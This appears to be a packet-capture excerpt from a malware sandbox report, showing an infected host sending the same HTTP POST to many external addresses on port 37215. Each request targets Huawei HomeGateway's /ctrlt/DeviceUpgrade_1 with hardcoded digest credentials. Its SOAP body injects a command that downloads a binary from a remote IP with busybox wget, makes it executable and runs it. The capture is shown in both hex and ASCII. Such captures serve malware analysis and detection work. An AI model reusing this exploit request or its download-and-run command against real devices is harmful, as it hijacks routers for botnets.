                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1311192.168.2.1539796222.191.7.17637215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:18.398180962 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1312192.168.2.1556304186.236.234.1137215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:18.398202896 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1313192.168.2.1558240102.12.29.637215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:18.398207903 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1314192.168.2.1542772156.134.181.10637215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:18.398221970 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1315192.168.2.1547012181.235.102.4737215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:18.398237944 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1316192.168.2.153497694.16.3.12137215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:18.398257017 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1317192.168.2.155023694.255.194.1537215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:18.398330927 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1318192.168.2.1546882156.150.94.2737215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:18.398350000 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1319192.168.2.1557746122.58.138.9437215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:18.398363113 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1320192.168.2.155684641.250.79.17037215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:18.398363113 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
